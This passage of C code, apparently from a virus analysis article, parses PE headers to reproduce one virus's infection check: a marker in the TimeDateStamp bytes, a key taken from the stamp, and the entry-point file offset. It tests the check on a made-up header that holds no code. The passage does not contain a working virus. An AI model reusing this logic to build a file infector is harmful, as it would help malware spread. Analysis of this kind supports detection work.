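} pe_scan_t;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Parse the headers of an in-memory PE image into *out. Returns 1 if the headers parsed. */
int scan_pe(const uint8_t *buf, size_t len, pe_scan_t *out) {
    memset(out, 0, sizeof *out);
    out->ep_section = -1;
    if (len < 0x40 || rd16(buf) != 0x5A4D) return 0;             /* "MZ" */
    uint32_t pe = rd32(buf + 0x3C);                               /* e_lfanew */
    if (pe > len || len - pe < 0x78) return 0;                    /* signature + file header + optional-header fields read below */
    const uint8_t *nt = buf + pe;
    if (rd32(nt) != 0x00004550u) return 0;                        /* "PE\0\0" */
    out->valid_pe = 1;
    uint16_t nsec = rd16(nt + 0x06);                              /* NumberOfSections */
    out->time_date_stamp = rd32(nt + 0x08);
    out->infected = rd16(nt + 0x09) == INFECT_MARKER;             /* the test of step 10 */
    out->key = out->time_date_stamp ? out->time_date_stamp : DEFAULT_KEY;
    out->entry_rva = rd32(nt + 0x28);
    const uint8_t *sec = nt + 0x18 + rd16(nt + 0x14);             /* first section header */
    if ((size_t)(sec - buf) + (size_t)nsec * 0x28 > len) return 0;
    for (uint16_t i = 0; i < nsec; i++, sec += 0x28) {
        uint32_t vsz = rd32(sec + 0x08), va = rd32(sec + 0x0C), raw = rd32(sec + 0x14);
        /* same inclusive bounds test as 00412B89..00412B92 */
        if (out->ep_section < 0 && out->entry_rva >= va && out->entry_rva <= va + vsz) {
            out->ep_section = i;
            out->ep_file_offset = out->entry_rva - va + raw;
        }
        if (i == nsec - 1) out->last_sec_rw_data = rd32(sec + 0x24) == LAST_SEC_CHARS;
    }
    return 1;
}

/* Constructed sample: a minimal two-section PE32 header with made-up values and no code. */
size_t build_sample(uint8_t *buf, size_t cap, int mark_infected) {
    if (cap < 0x400) return 0;
    memset(buf, 0, 0x400);
    wr16(buf + 0x00, 0x5A4D);                /* "MZ" */
    wr32(buf + 0x3C, 0x80);                  /* e_lfanew */
    uint8_t *nt = buf + 0x80;
    wr32(nt + 0x00, 0x00004550u);            /* "PE\0\0" */
    wr16(nt + 0x04, 0x014C);                 /* Machine: i386 */
    wr16(nt + 0x06, 2);                      /* NumberOfSections */
    wr32(nt + 0x08, 0x4A5B3C2Du);            /* TimeDateStamp (made up) */
    if (mark_infected) wr16(nt + 0x09, INFECT_MARKER);
    wr16(nt + 0x14, 0xE0);                   /* SizeOfOptionalHeader */
    wr16(nt + 0x16, 0x0102);                 /* EXECUTABLE_IMAGE | 32BIT_MACHINE */
    wr16(nt + 0x18, 0x010B);                 /* Magic: PE32 */
    wr32(nt + 0x28, 0x1234);                 /* AddressOfEntryPoint */
    wr32(nt + 0x34, 0x00400000u);            /* ImageBase */
    wr32(nt + 0x38, 0x1000);                 /* SectionAlignment */
    wr32(nt + 0x3C, 0x200);                  /* FileAlignment */
    wr32(nt + 0x50, 0x3000);                 /* SizeOfImage */
    wr16(nt + 0x5C, 2);                      /* Subsystem: WINDOWS_GUI */
    uint8_t *s = nt + 0x18 + 0xE0;           /* first section header */
    memcpy(s, ".text", 5);
    wr32(s + 0x08, 0x800); wr32(s + 0x0C, 0x1000); wr32(s + 0x10, 0x800); wr32(s + 0x14, 0x400);
    wr32(s + 0x24, 0x60000020u);             /* CODE | EXECUTE | READ */
    s += 0x28;
    memcpy(s, ".data", 5);
    wr32(s + 0x08, 0x200); wr32(s + 0x0C, 0x2000); wr32(s + 0x10, 0x200); wr32(s + 0x14, 0xC00);
    wr32(s + 0x24, LAST_SEC_CHARS);          /* INITIALIZED_DATA | READ | WRITE */
    return 0x400;
}

/* Build and scan the sample; returns a zeroed result if parsing failed. */
pe_scan_t scan_sample(int mark_infected) {
    uint8_t buf[0x400];
    pe_scan_t r;
    size_t n = build_sample(buf, sizeof buf, mark_infected);
    if (!scan_pe(buf, n, &r)) memset(&r, 0, sizeof r);
    return r;
}

int main(void) {
    for (int mark = 0; mark <= 1; mark++) {
        pe_scan_t r = scan_sample(mark);
        printf("TimeDateStamp=%08X infected=%d key=%08X EP=%05X section=%d file_offset=%05X last_rw_data=%d\n",
               (unsigned)r.time_date_stamp, r.infected, (unsigned)r.key, (unsigned)r.entry_rva,
               r.ep_section, (unsigned)r.ep_file_offset, r.last_sec_rw_data);
    }
    return 0;
}
```

For the clean sample the entry point 1234H falls in .text (VirtualAddress 1000H, PointerToRawData 400H), so the reported file offset is 634H; marking the sample overwrites the two middle bytes of TimeDateStamp with C354H, which is why a scanner cannot recover the original stamp from an infected header and why the key shown is only meaningful for a clean host.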
http://www.hack58.net/Article/60/64/2006/8060.htm